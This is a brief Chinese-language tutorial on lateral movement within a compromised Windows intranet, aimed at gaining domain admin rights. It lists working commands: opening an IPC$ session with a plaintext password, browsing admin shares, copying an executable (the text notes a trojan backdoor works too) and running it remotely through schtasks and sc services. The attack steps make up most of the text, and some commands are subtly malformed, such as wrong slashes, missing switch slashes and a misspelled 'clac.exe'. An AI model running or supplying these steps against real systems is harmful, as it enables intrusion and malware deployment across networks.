解释:,你已经拥有哪里内网中某一台主机的权限,想要扩大战果,获取域管理权限。
方法:
1)IPC 入侵(Inter-Process Communication) 进程间通信
命令 net use
实例:
net use \\192.168.100.138\IPC$ "bihuo.cn" /user:Administrator
利用IPC建立的链接,可以直接远程访问想要访问到的文件目录。
建立IPC后,可以直接打开共享目录。
也可以命令行中执行:dir \\192.168.100.138\c$
也可以copy一个可执行程序(木马后门也可以)到目标目录
copy c:/windows/system32/calc.exe //192.168.100.138 c$
建立定时任务执行程序
schtasks /create /S 192.168.100.138 /SC minute TN sch_test TR C:/calc.exe /ST 21:08
利用sc创建任务
sc \\192.168.100.138 create ipc_test binPath= "cmd.exe /c C:\clac.exe"
执行任务
sc \\192.168.100.138 start ipc_test
|